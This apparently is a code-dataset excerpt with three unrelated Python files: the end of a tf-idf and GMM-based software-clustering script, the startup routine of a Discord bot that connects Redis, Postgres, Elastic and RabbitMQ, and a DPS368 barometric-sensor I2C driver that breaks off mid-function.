        logging.warning('\t' + 'Alphabetic only:')
        logging.debug( '\t' + itemsStr)
        itemsStr = camelcase_sep.separateCamelCase(itemsStr)
        logging.warning( '\t' + 'Camel case separated and all lower case:')
        logging.debug( '\t' + itemsStr)
        doc = [word for word in itemsStr.lower().split() if word not in stoplist]
        logging.warning( '\t' + 'Removed stop words:')
        logging.debug( '\t' + str(doc))
        doc = [word for word in doc if word not in plWordList]
        logging.warning( '\t' + 'Removed pl words:')
        logging.debug( '\t' + str(doc))
        #doc = [stemming.porter2.stem(word) for word in doc]
        doc = stemmer.stemWords(doc)
        logging.warning( '\t' + 'Stemmed words:')
        logging.debug( '\t' + str(doc))
        filenames.append(filename)
        docs.append(doc)
    # remove words that appear only once
    '''all_tokens = sum(docs, [])
    tokens_once = set(word for word in set(all_tokens) if all_tokens.count(word) == 1)
    docs = [[word for word in text if word not in tokens_once]
            for text in docs]
    for index,doc in enumerate(docs):
        logging.warning( filenames[index])
        logging.warning( '\t' + 'Removed words that appear only once')
        logging.debug( '\t' + str(doc))'''
    return docs,filenames
def cos_sim(a, b):
    """Cosine similarity of vectors *a* and *b*.

    A zero norm product is replaced with a tiny epsilon so two zero
    vectors yield 0.0 instead of dividing by zero.
    """
    norm_product = np.linalg.norm(a) * np.linalg.norm(b)
    if norm_product == 0:
        norm_product = 0.0000001
    return np.dot(a, b) / norm_product
def conv_sparse_doc_to_full_doc(numTokens, doc):
    """Expand a gensim sparse vector [(id, weight), ...] into a dense
    list of length *numTokens* (missing ids become 0)."""
    dense = [0] * numTokens
    for token_id, weight in doc:
        dense[token_id] = weight
    return dense
@timed
def extract_java_toks(tree, zones):
    """Walk a srcML tree of Java sources and bucket tokens by zone.

    Returns {zone: {filename: [text, ...]}} for the zones: class,
    fields, func_names, params, func_blocks, comments.
    """
    units = {}
    for zone in zones:
        units[zone] = {}
    print 'Listing classes...'
    for unit in tree.iter('unit'):
        if not unit.get('filename') == None:
            #print unit.get('filename')
            filename = unit.get('filename')
            units['class'][filename] = []
            for clas in unit.iter('class'):
                for className in clas.findall('name'):
                    if not className.text == None: #print className.text
                        units['class'][filename].append(className.text)
                    else:
                        # generic class: name text is on a nested <name>
                        units['class'][filename].append(className.find('name').text) #print className.find('name').text
    for unitFilename, classNames in units['class'].iteritems():
        print unitFilename
        for className in classNames:
            print className
    print ''
    print 'Listing classes with more info...'
    for unit in tree.iter('unit'):
        if not unit.get('filename') == None:
            filename = unit.get('filename')
            units['fields'][filename] = []
            units['func_names'][filename] = []
            units['params'][filename] = []
            units['func_blocks'][filename] = []
            for clas in unit.iter('class'):
                # NOTE(review): lowercase 'currclassName' is never read;
                # likely a typo for currClassName, so the fallback
                # default is dead.
                currclassName = 'ERROR:INVALID_CLASS_NAME'
                for className in clas.findall('name'):
                    if not className.text == None:
                        currClassName = className.text
                        print currClassName
                    else:
                        currClassName = className.find('name').text
                        print currClassName
                for decl_stmt in clas.findall('block/decl_stmt'):
                    #print get_all_text(decl_stmt)
                    units['fields'][filename].append(get_all_text(decl_stmt))
                for constructor in clas.iter('constructor'):
                    allFuncNames, paramText, functionText = get_function_info(currClassName, constructor)
                    units['func_names'][filename].append(allFuncNames)
                    units['params'][filename].append(paramText)
                    units['func_blocks'][filename].append(functionText)
                for function in clas.iter('function'):
                    allFuncNames, paramText, functionText = get_function_info(currClassName, function)
                    units['func_names'][filename].append(allFuncNames)
                    units['params'][filename].append(paramText)
                    units['func_blocks'][filename].append(functionText)
    for unitFilename, fieldText in units['fields'].iteritems():
        print unitFilename
        print '\t' + str(fieldText)
    for unitFilename, funcNames in units['func_names'].iteritems():
        print unitFilename
        print '\t' + str(funcNames)
    for unitFilename, params in units['params'].iteritems():
        print unitFilename
        print '\t' + str(params)
    for unitFilename, blocks in units['func_blocks'].iteritems():
        logging.debug( unitFilename)
        logging.debug( '\t' + str(blocks) )
    print ''
    print 'Listing comments of each unit...'
    for unit in tree.iter('unit'):
        if not unit.get('filename') == None:
            #print unit.get('filename')
            filename = unit.get('filename')
            units['comments'][filename] = []
            for clas in unit.iter('class'):
                '''for className in clas.findall('name'):
                    if not className.text == None:
                        #print className.text
                        pass
                    else:
                        #print className.find('name').text
                        pass'''
                for comment in recurse_for_tag(clas, 'comment'):
                    #print comment.text
                    units['comments'][filename].append(comment.text)
            # top-level comments: the first one (presumably a license
            # header) is deliberately skipped via the commentStart flag
            commentStart = False
            for comment in unit.findall('comment'):
                if commentStart == True: #print comment.text
                    units['comments'][filename].append(comment.text)
                else:
                    commentStart = True
    for unitFilename, comments in units['comments'].iteritems():
        print unitFilename
        print '\t' + str(comments)
    return units
@timed
def extract_c_toks(tree, zones):
    """Walk a srcML tree of C sources and bucket tokens by zone.

    Returns {zone: {filename: [text, ...]}} for the zones: modvars,
    func_names, params, func_blocks, comments.
    """
    units = {}
    for zone in zones:
        units[zone] = {}
    logging.debug('Listing variables in module scope...')
    for unit in tree.iter('unit'):
        if not unit.get('filename') == None:
            filename = unit.get('filename')
            # NOTE(review): logging.debug with two positional args but no
            # %s placeholder; the filename is never rendered.
            logging.debug( 'unit filename:', filename)
            units['modvars'][filename] = []
            for modvar in unit.findall('decl_stmt'):
                modvarText = get_all_text(modvar)
                logging.debug( modvarText)
                units['modvars'][filename].append(modvarText)
    logging.debug( '')
    logging.debug( 'Listing functions with more info...')
    for unit in tree.iter('unit'):
        if unit.get('filename') != None:
            filename = unit.get('filename')
            units['func_names'][filename] = []
            units['params'][filename] = []
            units['func_blocks'][filename] = []
            for function in unit.iter('function'):
                allFuncNames, paramText, functionText = get_function_info(filename, function)
                logging.debug('')
                logging.debug( allFuncNames )
                logging.debug( paramText)
                logging.debug( functionText)
                logging.debug('')
                units['func_names'][filename].append(allFuncNames)
                units['params'][filename].append(paramText)
            # block text is collected per unit, not per function
            allFunctionBlockText = ''
            for block in unit.iter('block'):
                allFunctionBlockText = allFunctionBlockText + ' ' + get_all_text(block)
            units['func_blocks'][filename].append(allFunctionBlockText)
    for unitFilename, funcNames in units['func_names'].iteritems():
        logging.debug( unitFilename)
        logging.debug( '\t' + str(funcNames))
    for unitFilename, params in units['params'].iteritems():
        logging.debug( unitFilename)
        logging.debug( '\t' + str(params))
    for unitFilename, blocks in units['func_blocks'].iteritems():
        logging.debug( unitFilename )
        logging.debug( '\t' + str(blocks))
    logging.debug( '')
    logging.debug( 'Listing comments of each unit...')
    for unit in tree.iter('unit'):
        if not unit.get('filename') == None:
            #print unit.get('filename')
            filename = unit.get('filename')
            units['comments'][filename] = []
            for clas in unit.iter('class'):
                '''for className in clas.findall('name'):
                    if not className.text == None:
                        #print className.text
                        pass
                    else:
                        #print className.find('name').text
                        pass'''
                for comment in recurse_for_tag(clas, 'comment'):
                    #print comment.text
                    units['comments'][filename].append(comment.text)
            # skip the first top-level comment (presumed license header)
            commentStart = False
            for comment in unit.findall('comment'):
                if commentStart == True: #print comment.text
                    units['comments'][filename].append(comment.text)
                else:
                    commentStart = True
    for unitFilename, comments in units['comments'].iteritems():
        logging.debug( unitFilename)
        logging.debug( '\t' + str(comments))
    return units
@timed
def calc_sim_mine(zone, tfidfDocsFull, doc1Index, doc2Index):
    """Cosine similarity of two dense tf-idf vectors using the local
    cos_sim helper (hand-rolled alternative to calc_sim_scipy)."""
    doc1Full = tfidfDocsFull[zone][doc1Index]
    doc2Full = tfidfDocsFull[zone][doc2Index] #print 'doc1Full', doc1Full
    #print 'doc1np', doc1Full
    # compute cosine similarity using my implementation
    cossimval = cos_sim(doc1Full, doc2Full)
    return cossimval
def calc_sim_scipy(zone, tfidfDocsNp, doc1Index, doc2Index):
    """Cosine similarity of two docs' tf-idf vectors via scipy
    (1 - cosine distance)."""
    vec_a = tfidfDocsNp[zone][doc1Index]
    vec_b = tfidfDocsNp[zone][doc2Index]
    return 1 - scipy.spatial.distance.cosine(vec_a, vec_b)
@timed
def fast_compute_sim(zones, tfidfs, numDocs, numTokens, weights, filenames):
    """Compute the weighted, per-zone cosine similarity matrix.

    Builds a numDocs x numDocs matrix per zone, then sums them using
    one weight per zone.  Returns the combined matrix (list of lists).
    """
    assert len(weights) == len(zones)
    # initialize sim matrix for each zone
    sim = {}
    for zone in zones:
        sim[zone] = [ [0 for i in range(numDocs)] for j in range(numDocs) ]
        print sim[zone]
    # check lengths of one sim matrix
    assert len(sim[zones[0]]) == numDocs
    assert len(sim[zones[0]][0]) == numDocs
    # initialize combined sim matrix
    simCombined = [[0 for i in range(numDocs)] for j in range(numDocs)]
    # store each documents tfidf values
    tfidfDocs = {}
    for zone in zones:
        tfidfDocs[zone] = []
        for doc in tfidfs[zone]:
            tfidfDocs[zone].append(doc)
    # densify the sparse gensim vectors once, up front
    tfidfDocsFull = {}
    for zone in zones:
        tfidfDocsFull[zone] = [ conv_sparse_doc_to_full_doc(numTokens,tfidfDocs[zone][i]) for i in xrange(numDocs) ]
    tfidfDocsNp = {}
    for zone in zones:
        tfidfDocsNp[zone] = np.array(tfidfDocsFull[zone])#[ np.asarray(tfidfDocsFull[zone][i]) for i in xrange(numDocs) ]
    # compute sim matrix for each zone (upper triangle, then mirrored)
    for zone in zones:
        for doc1Index in xrange(0, numDocs, 1):
            for doc2Index in xrange(doc1Index, numDocs, 1):
                if doc1Index % 10 == 0:
                    print 'current sim indices being calculated: {0},{1},{2}'.format(zone,doc1Index,doc2Index)
                #doc1 = tfidfDocs[zone][doc1Index]
                #doc2 = tfidfDocs[zone][doc2Index]
                #cossimval = calc_sim_mine(zone, tfidfDocsFull, doc1Index, doc2Index)
                cossimval = calc_sim_scipy(zone, tfidfDocsNp, doc1Index, doc2Index)
                # NaN (zero vectors) is coerced to 0 similarity
                sim[zone][doc1Index][doc2Index] = 0 if math.isnan(cossimval) else cossimval
                sim[zone][doc2Index][doc1Index] = sim[zone][doc1Index][doc2Index]
    # print sim matrix for each zone
    for zone in zones:
        print 'sim[' + zone + ']'
        for row in sim[zone]:
            print row
    # print sim matrix for each zone with zone name and filename
    for zone in zones:
        for i in range(numDocs):
            for j in range(numDocs):
                if not sim[zone][i][j] == 0:
                    print zone, filenames[i], filenames[j], sim[zone][i][j]
    # check symmetry for sim matrices
    for zone in zones:
        for i in xrange(0,numDocs,1):
            for j in xrange(i,numDocs,1):
                #print '({0},{1})'.format(i,j),
                assert sim[zone][i][j] == sim[zone][j][i]
    #print ''36
    # create combined sim matrix
    for zoneIndex, zone in enumerate(zones):
        for i in range(0, numDocs, 1):
            for j in range(0, numDocs, 1):
                if i == j:
                    print 'weights[zoneIndex]', weights[zoneIndex]
                    print 'sim[zone][i][j]', sim[zone][i][j]
                simCombined[i][j] += weights[zoneIndex]*sim[zone][i][j]
    return simCombined
def gaac_sim(cluster1, cluster2, sim):
sumCosSim = 0
for i in cluster1:
for j in cluster2:
sumCosSim += sim[i][j]
if sumCosSim == 0:
return 0
denom = (len(cluster1)+len(cluster2))*(len(cluster1)+len(cluster2)-1)
return sumCosSim/denom
@timed
def createobs(sysname, zones, docs, filenames, numDocs, giantDict, numTokens):
    """Build the observation matrix for GMM fitting.

    One row per document; each zone occupies its own numTokens-wide
    column band, filled with tf-idf weights.  Returns (obs, tfidfs,
    id2token).  Serializes each zone's corpus to /tmp as a side effect.
    """
    obs = []
    # initialize obs
    for numDoc in range(numDocs):
        obs.append([0 for numToken in range(len(zones) * numTokens)])
    mycorpora = {}
    tfidfs = {}
    id2token = {}
    for zoneIndex, zone in enumerate(zones):
        # reverse mapping (same for every zone; built from giantDict)
        id2token[zone] = {}
        for token, id in giantDict.token2id.iteritems():
            id2token[zone][id] = token
        mycorpora[zone] = [giantDict.doc2bow(doc) for doc in docs[zone]]
        corpora.MmCorpus.serialize('/tmp/' + sysname + '_' + zone + '.mm', mycorpora[zone]) # store to disk, for later use
        print mycorpora[zone]
        tfidfModel = models.TfidfModel(mycorpora[zone]) # step 1 -- initialize a model
        tfidfs[zone] = tfidfModel[mycorpora[zone]]
        print ''
        print 'Analyzing zone ' + zone
        for index, doc in enumerate(tfidfs[zone]):
            print filenames[index], doc
        print ''
        print 'Total number of tokens for zone ' + zone + ': ' + str(len(id2token[zone].keys()))
        #obs.append( [0 for key in range(len(id2token[zone].keys())) ] )
        print ''
        print 'Printing tokens with ids and tfidfModel values for zone ' + zone + ':'
        for index, doc in enumerate(tfidfs[zone]):
            for id, value in doc:
                print filenames[index] + ' ' + id2token[zone][id] + ' ' + str(id) + "," + str(value)
                #obs[index].append(value)
    # scatter the tf-idf weights into each zone's column band
    for zoneIndex, zone in enumerate(zones):
        for tfidfIndex, doc in enumerate(tfidfs[zone]):
            for id, value in doc:
                colIndex = zoneIndex * numTokens + id
                obs[tfidfIndex][colIndex] = value
    for row in obs:
        print len(row), ' - ', row
    numZeros = []
    for row in obs:
        numZeros.append([val for val in row if val == 0])
    print ''
    print 'Number of zeros in rows:'
    for row in numZeros:
        print len(row)
    #for zoneIndex,obsRow in enumerate(obs):
    #    for termIndex,obsCol in enumerate(obsRow):
    #        print zones[zoneIndex] + ':' + id2token[zones[zoneIndex]][termIndex] + ':' + str(termIndex) + ':' + str(obs[zoneIndex][termIndex]),
    return obs, tfidfs, id2token
@timed
def calcweights(zones, filenames, initialWeights, obs, tfidfs, id2token):
    """Fit a GMM (one component per zone) on obs and return the learned
    mixture weights, seeded from *initialWeights*."""
    g = mixture.GMM(n_components=len(zones),n_iter=500)
    print 'original initial weights', g.weights_
    #g.fit(obs)
    #print 'weights', g.weights_
    #print 'means', g.means_
    #print 'covars', g.covars_
    #g = mixture.GMM(n_components=len(zones))
    # seed EM from the supplied weights instead of sklearn's defaults
    g.weights_ = initialWeights
    print 'zone-tokens-based initial weights', g.weights_
    g.fit(obs)
    print 'weights', g.weights_
    print 'means', g.means_
    print 'covars', g.covars_
    print ''
    for zoneIndex, zone in enumerate(zones):
        for docIndex, doc in enumerate(tfidfs[zone]):
            print zone, filenames[docIndex]
            print [id2token[zone][id] + ' ' + str(id) + "," + str(value) for id, value in doc]
    return g.weights_
def max_indices(mat):
    """Locate the maximum entry of a 2-D numpy array.

    Returns (value, row, col) of the largest element, found by taking
    the best row per column and then the best column overall.
    """
    best_row_per_col = mat.argmax(0)
    col_maxima = np.array(
        [mat[row][col] for col, row in enumerate(best_row_per_col)]
    )
    best_col = col_maxima.argmax()
    best_row = best_row_per_col[best_col]
    return mat[best_row][best_col], best_row, best_col
@timed
def most_sim_clusterpair(sim, clusters):
    """Brute-force scan for the most similar pair of distinct clusters.

    Returns (similarity, i, j) with i < j.  Superseded by max_indices
    in runclustering but kept for reference.  Assumes at least one
    off-diagonal pair exists (maxi/maxj are unbound otherwise).
    """
    maxSimVal = -1
    for i in xrange(0, len(clusters), 1):
        for j in range(i, len(clusters), 1):
            if i != j:
                if sim[i][j] > maxSimVal:
                    maxSimVal = sim[i][j]
                    maxi = i
                    maxj = j
    return maxSimVal, maxi, maxj
def del_old_vals(sim, clusters, maxi, maxj):
    """Drop the two merged clusters' rows/columns from *sim* and their
    entries from *clusters* (mutated in place).

    The higher index is removed first so the lower one stays valid.
    Returns the shrunken similarity matrix (np.delete copies).
    """
    hi, lo = (maxj, maxi) if maxj > maxi else (maxi, maxj)
    for idx in (hi, lo):
        sim = np.delete(sim, idx, axis=0)
        sim = np.delete(sim, idx, axis=1)
        del clusters[idx]
    return sim
def check_sim_dims(sim, clusters):
    """Assert that *sim* is square with one row/column per cluster."""
    expected = len(clusters)
    assert len(sim) == expected
    for row in sim:
        assert len(row) == expected
def add_new_simrows(sim, clusters, newRow):
    """Append newRow's entry to every existing row of *sim* except the
    last cluster's own row (currently unused; superseded by the numpy
    padding in runclustering)."""
    newest = len(clusters) - 1
    for idx, row in enumerate(sim):
        if idx != newest:
            row.append(newRow[idx])
def runclustering(filenames, numDocs, sim):
    """Group-average agglomerative clustering over the similarity matrix.

    Starts with one singleton cluster per document and repeatedly merges
    the most similar pair until only 10% of the clusters remain.
    Returns the list of clusters (sets of document indices).
    """
    print 'python sim:'
    print sim[0]
    sim = np.array(sim)
    # keep the original similarities for GAAC recomputation
    origSim = np.array(sim)
    # zero the diagonal so a cluster never merges with itself
    for i in xrange(numDocs):
        sim[i][i] = 0
    print 'numpy sim:'
    print sim[0]
    clusters = []
    for i in range(numDocs):
        cluster = set()
        cluster.add(i)
        clusters.append(cluster)
    cutoff = int(len(clusters) * 0.1)
    while len(clusters) != cutoff:
        maxi = -1
        maxj = -1
        #maxSimVal, maxi, maxj = most_sim_clusterpair(sim, clusters)
        maxSimVal, maxi, maxj = max_indices(sim)
        # maxi == maxj can only happen when every similarity is zero
        notallzeros = 'maxi == maxj and sim matrix is not all zeros'
        if maxi == maxj:
            for i in xrange(len(sim)):
                for j in xrange(i,len(sim),1):
                    assert sim[i][j] == 0, notallzeros
                    assert sim[j][i] == 0, notallzeros
        assert maxSimVal != -1
        assert maxi != -1
        assert maxj != -1
        print 'max sim val: {0}'.format(maxSimVal)
        print 'max i ({0}): {1}'.format(maxi, [filenames[i] for i in clusters[maxi]])
        print 'max j ({0}): {1}'.format(maxj, [filenames[i] for i in clusters[maxj]])
        newCluster = clusters[maxi] | clusters[maxj]
        sim = del_old_vals(sim, clusters, maxi, maxj)
        clusters.append(newCluster)
        # similarity of the merged cluster to all survivors (incl. itself)
        newRow = [gaac_sim(newCluster, cluster, origSim) for cluster in clusters]
        # grow sim by one row/column and fill in the new similarities
        expsim = np.zeros((len(sim)+1,len(sim)+1))
        expsim[:len(sim),:len(sim)] = sim
        sim = expsim
        for pos, val in enumerate(newRow):
            sim[-1][pos] = val
            sim[pos][-1] = val
        sim[-1][-1] = 0
        #add_new_simrows(sim, clusters, newRow)
        print ''
        print newRow
        #sim.append(newRow)
        print sim
        check_sim_dims(sim, clusters)
    return clusters
@timed
def writeclustersfile(args, sysname, filenames, clusters):
    """Write the clustering result as RSF 'contain <cluster> <entity>'
    lines under data/, with the filename reflecting the weight scheme.

    Java entities are dotted class paths with '.java' stripped; C
    entities keep their raw filenames.
    """
    datadir = 'data'
    if not os.path.exists(datadir):
        os.makedirs(datadir)
    if args['weights'] == 'uni':
        outputClustersRsfFilename = datadir + '/' + sysname + '_zclusters_uniweights.rsf'
    elif args['weights'] == 'em':
        outputClustersRsfFilename = datadir + '/' + sysname + '_zclusters_emweights.rsf'
    else:
        raise Exception('invalid weights selected')
    out = open(outputClustersRsfFilename, 'w')
    for clusterIndex, cluster in enumerate(clusters):
        for filenameIndex in cluster:
            entityName = None
            if args['lang'] == 'java':
                entityName = string.replace(string.replace(filenames[filenameIndex], '/', '.'), '.java', '')
            elif args['lang'] == 'c':
                entityName = filenames[filenameIndex]
            else:
                raise Exception('Invalid language')
            rsfLine = 'contain {0} {1}'.format(clusterIndex, entityName)
            print rsfLine
            out.write(rsfLine + '\n')
    out.close()
def interact():
    """Drop into an interactive console sharing this module's globals
    (debugging aid)."""
    import code
    code.InteractiveConsole(locals=globals()).interact()
@timed
def exec_first_phase(args,sysname,tree):
    """Run extraction through similarity computation.

    Extracts zone tokens for the selected language, builds bag-of-words
    docs, derives zone weights (uniform or token-count seeded EM), and
    computes the combined similarity matrix (pickled to /tmp).
    Returns (filenames, numDocs, sim).
    """
    zones = None
    units = None
    if args['lang'] == 'java':
        zones = ['class', 'fields', 'func_names', 'params', 'func_blocks', 'comments']
        units = extract_java_toks(tree, zones)
    elif args['lang'] == 'c':
        zones = ['modvars', 'func_names', 'params', 'func_blocks', 'comments']
        units = extract_c_toks(tree, zones)
    '''
    hp = hpy()
    hp.setrelheap()
    h = hp.heap()
    '''
    docs = {}
    filenames = []
    docsAllZones = []
    for zone in zones:
        print
        print 'creating bow for ' + zone
        docs[zone], filenames = createbow(args, units[zone])
        for doc in docs[zone]:
            docsAllZones.append(doc)
    #import pdb; pdb.set_trace()
    numTokensInZone = {}
    for zone in zones:
        numTokensInZone[zone] = 0
    for zone in zones:
        for doc in docs[zone]:
            logging.debug(zone, doc)
            for word in doc:
                numTokensInZone[zone] += 1
    totalTokensAcrossAllZones = 0
    for zone in zones:
        totalTokensAcrossAllZones += numTokensInZone[zone]
    print ''
    for zone in zones:
        print 'number of tokens in zone', zone, numTokensInZone[zone]
    print 'number of tokens across all zones', totalTokensAcrossAllZones
    # each zone's weight is its share of the total token count
    tokenBasedWeights = []
    for zone in zones:
        denom = float(totalTokensAcrossAllZones)
        if denom == 0:
            denom = .00001
        numer = float(numTokensInZone[zone])
        tokenBasedWeights.append(numer / denom)
    equalWeights = []
    for zone in zones:
        equalWeights.append(float(1) / float(len(zones)))
    print 'initial weights based on tokens in zone:'
    print tokenBasedWeights
    selectedWeights = []
    if args['weights'] == 'uni':
        selectedWeights = equalWeights
    elif args['weights'] == 'em':
        selectedWeights = tokenBasedWeights
    else:
        raise Exception('invalid weight selection: {0}'.format(args['weights']))
    # create one row in obs for each document
    numDocs = len([doc for doc in docs[zones[0]]])
    assert len(units[zones[0]].keys()) == numDocs
    # one shared dictionary across all zones keeps token ids aligned
    giantDict = corpora.Dictionary(docsAllZones)
    giantDict.save('/tmp/' + sysname + '.dict') # store the dictionary, for future reference
    print giantDict
    numTokens = len(giantDict.token2id.keys())
    print 'total number of tokens from giantDict: ', numTokens
    obs, tfidfs, id2token = createobs(sysname, zones, docs, filenames, numDocs, giantDict, numTokens)
    print 'size of obs: ', sys.getsizeof(obs)
    emweights = calcweights(zones, filenames, selectedWeights, obs, tfidfs, id2token)
    #compute_sim(zones, tfidfs, numTokens, sim)
    simFilename = '/tmp/' + sysname + '_sim.pkl'
    sim = None
    simFile = None
    usingSavedSim = False
    sim = fast_compute_sim(zones, tfidfs, numDocs, numTokens, emweights, filenames)
    simFile = open(simFilename, 'w')
    pickle.dump(sim, simFile)
    # if os.path.isfile(simFilename) and usingSavedSim:
    #    simFile = open(simFilename,'r')
    #    sim = pickle.load(simFile)
    # else:
    #    sim = fast_compute_sim(zones, tfidfs, numDocs, numTokens, selectedWeights, filenames)
    #    simFile = open(simFilename,'w')
    #    pickle.dump(sim,simFile)
    # simFile.close()
    print ''
    print 'Doc sim matrix:'
    for row in sim:
        print row
    return filenames, numDocs, sim
def main():
    """Run the full pipeline: setup, similarity computation, clustering, output."""
    cli_args, system_name, ast_tree = setup()
    doc_names, doc_count, sim_matrix = exec_first_phase(cli_args, system_name, ast_tree)
    cluster_assignments = runclustering(doc_names, doc_count, sim_matrix)
    writeclustersfile(cli_args, system_name, doc_names, cluster_assignments)
if __name__ == '__main__':
    # Profile the whole run; stats are written to main.prof (inspect with pstats).
    cProfile.run('main()','main.prof')
|
995,091 | e0fc1a9202f8491f59ee7c065f6eb0c5407eb81e | from discord import Client
import aioredis
from logging import getLogger
from elastic_helper import ElasticSearchClient
from sql_helper import SQLConnection
from sql_helper.metrics import sql_wrapper
from nqn_common import dpy, GlobalContext
from rabbit_parsers import DemoBaseRabbit
log = getLogger(__name__)
async def initialise(config, postgres_pool):
    """Connect all backing services and hand control to dpy.take_over_the_world.

    Order matters: Redis must be up before dpy.connect (which uses the
    non-persistent pool), and the global context is only built after the
    Discord connection so the bot's own user is known.

    Args:
        config: configuration mapping (service hosts/URIs, Discord token, tunables).
        postgres_pool: pre-created PostgreSQL connection pool.
    """
    elastic = ElasticSearchClient(config["elastic"]["hosts"])
    bot = Client()
    log.info("Connecting to Redis")
    # Two Redis pools: one for durable state, one for cache-style state.
    persistent_redis = await aioredis.create_redis_pool(config["persistent_redis_uri"], encoding="utf-8")
    nonpersistent_redis = await aioredis.create_redis_pool(config["nonpersistent_redis_uri"], encoding="utf-8")
    log.info("Connecting to PostgreSQL")
    postgres: SQLConnection = SQLConnection(
        postgres_pool,
        bot.get_guild,
        sql_wrapper("commands")  # metrics label for queries issued from this process
    )
    await dpy.connect(
        bot,
        nonpersistent_redis,
        config["discord"]["proxy"],
        config["discord"]["token"]
    )
    log.info("Connecting to RabbitMQ")
    guild_cache = dpy.GuildCache(bot, nonpersistent_redis)
    rabbit = DemoBaseRabbit(bot, guild_cache, config["rabbit_uri"])
    log.info("Initialising global context")
    bot.global_ctx = GlobalContext.from_databases(
        owner=bot.owner,  # NOTE(review): `owner` is not a stock discord.Client attr — presumably set by dpy.connect; confirm
        bot_user=bot.user,
        postgres=postgres,
        elastic=elastic,
        persistent_redis=persistent_redis,
        nonpersistent_redis=nonpersistent_redis,
        get_guild=bot.get_guild,
        get_emoji=bot.get_emoji,
        emote_hasher_url=config["hasher_url"],
        webhook_url=config["webhook_url"],
        user_emote_cache_time=config.get("user_emote_cache_time", 10),
        broadcast_prefix=rabbit.send_prefix
    )
    log.info("Bot initialised, connecting to Discord")
    await guild_cache.load_state_from_redis()
    await bot.global_ctx.aliases.update_alias_servers()
    async def cleanup():
        # No teardown work needed yet; placeholder hook.
        pass
    dpy.take_over_the_world(
        rabbit=rabbit,
        redis=nonpersistent_redis,
        process_name="demo_base_bot",
        world_takeover_sleep=config.get("world_takeover_sleep", 5),
        cleanup=cleanup()  # NOTE(review): passes a coroutine object, not the function — confirm the callee awaits it
    )
    log.info("Finished initialising")
|
995,092 | faf8ad0bdf36a0359115dfe26b3e91fec301cdab | import time
import board
def getTwosComplement(raw_val, length):
    """Interpret `raw_val` as a signed two's-complement integer of `length` bits.

    Args:
        raw_val (int): Unsigned raw value as read from the sensor.
        length (int): Bit width of the field.

    Returns:
        int: Sign-extended value.
    """
    sign_bit = 1 << (length - 1)
    if raw_val & sign_bit:
        return raw_val - (sign_bit << 1)
    return raw_val
class DPS368:
    """Driver for the Infineon DPS368 barometric pressure / temperature sensor
    over the CircuitPython I2C bus.

    kP / kT are the compensation scale factors for 64x oversampling
    (DPS368 datasheet, "Compensation Scale Factors" table).
    """

    bus = board.I2C()  # class-level: all instances share one I2C master
    address = 0x76
    kP = 1040384  # pressure scale factor for 64x oversampling
    kT = 1040384  # temperature scale factor for 64x oversampling

    def __init__(self, address=0x76):
        """Initialise the sensor at `address`: apply the temperature-correction
        workaround, then configure measurement/oversampling rates."""
        self.address = address
        self.__correctTemperature()
        self.__setOversamplingRate()

    def write_byte_data(self, addr, register, data):
        """Write the byte `data` into `register` of the device at `addr`.

        Bug fix: the previous `if (data):` test dropped the data byte whenever
        it was 0x00, so the zero writes in __correctTemperature() only set the
        register pointer instead of clearing the register. `data is None` now
        selects the register-pointer-only write explicitly.
        """
        if data is None:
            payload = bytearray([register])
        else:
            payload = bytearray([register, data])
        self.bus.writeto(addr, payload)

    def read_byte_data(self, addr, registry):
        """Read and return one byte from register `registry` of device `addr`."""
        registry = bytearray([registry])
        result = bytearray(1)
        self.bus.writeto_then_readfrom(addr, registry, result)
        return result[0]

    def __correctTemperature(self):
        """Apply the vendor workaround for spurious >60 C temperature readings."""
        self.write_byte_data(self.address, 0x0E, 0xA5)
        self.write_byte_data(self.address, 0x0F, 0x96)
        self.write_byte_data(self.address, 0x62, 0x02)
        self.write_byte_data(self.address, 0x0E, 0x00)
        self.write_byte_data(self.address, 0x0F, 0x00)

    def __setOversamplingRate(self):
        """Configure 4 Hz measurement rate with 64x oversampling for both
        pressure and temperature, then enable continuous measurement."""
        # PRS_CFG (0x06) / TMP_CFG (0x07): 4 Hz rate, 64x oversampling.
        self.write_byte_data(self.address, 0x06, 0x26)
        self.write_byte_data(self.address, 0x07, 0xA6)
        # CFG_REG (0x08): result bit-shift enabled for both channels.
        self.write_byte_data(self.address, 0x08, 0x07)
        # MEAS_CFG (0x09): continuous pressure + temperature measurement.
        self.write_byte_data(self.address, 0x09, 0x0C)

    def __getRawPressure(self):
        """Return the signed 24-bit raw pressure reading (registers 0x00-0x02, MSB first)."""
        p1 = self.read_byte_data(self.address, 0x00)
        p2 = self.read_byte_data(self.address, 0x01)
        p3 = self.read_byte_data(self.address, 0x02)
        p = (p1 << 16) | (p2 << 8) | p3
        return getTwosComplement(p, 24)

    def __getRawTemperature(self):
        """Return the signed 24-bit raw temperature reading (registers 0x03-0x05, MSB first)."""
        t1 = self.read_byte_data(self.address, 0x03)
        t2 = self.read_byte_data(self.address, 0x04)
        t3 = self.read_byte_data(self.address, 0x05)
        t = (t1 << 16) | (t2 << 8) | t3
        return getTwosComplement(t, 24)

    def __getPressureCalibrationCoefficients(self):
        """Read pressure calibration coefficients from registers 0x13-0x21.

        Returns:
            tuple: (c00, c10, c20, c30, c01, c11, c21), each sign-extended to
            its datasheet width (c00/c10: 20 bit, rest: 16 bit).
        """
        src13 = self.read_byte_data(self.address, 0x13)
        src14 = self.read_byte_data(self.address, 0x14)
        src15 = self.read_byte_data(self.address, 0x15)
        src16 = self.read_byte_data(self.address, 0x16)
        src17 = self.read_byte_data(self.address, 0x17)
        src18 = self.read_byte_data(self.address, 0x18)
        src19 = self.read_byte_data(self.address, 0x19)
        src1A = self.read_byte_data(self.address, 0x1A)
        src1B = self.read_byte_data(self.address, 0x1B)
        src1C = self.read_byte_data(self.address, 0x1C)
        src1D = self.read_byte_data(self.address, 0x1D)
        src1E = self.read_byte_data(self.address, 0x1E)
        src1F = self.read_byte_data(self.address, 0x1F)
        src20 = self.read_byte_data(self.address, 0x20)
        src21 = self.read_byte_data(self.address, 0x21)
        c00 = (src13 << 12) | (src14 << 4) | (src15 >> 4)
        c00 = getTwosComplement(c00, 20)
        c10 = ((src15 & 0x0F) << 16) | (src16 << 8) | src17
        c10 = getTwosComplement(c10, 20)
        c20 = (src1C << 8) | src1D
        c20 = getTwosComplement(c20, 16)
        c30 = (src20 << 8) | src21
        c30 = getTwosComplement(c30, 16)
        c01 = (src18 << 8) | src19
        c01 = getTwosComplement(c01, 16)
        c11 = (src1A << 8) | src1B
        c11 = getTwosComplement(c11, 16)
        # Bug fix: was `(src1E < 8)` (less-than), which collapsed the high
        # byte to a boolean and corrupted c21; the datasheet layout is
        # c21 = reg0x1E << 8 | reg0x1F.
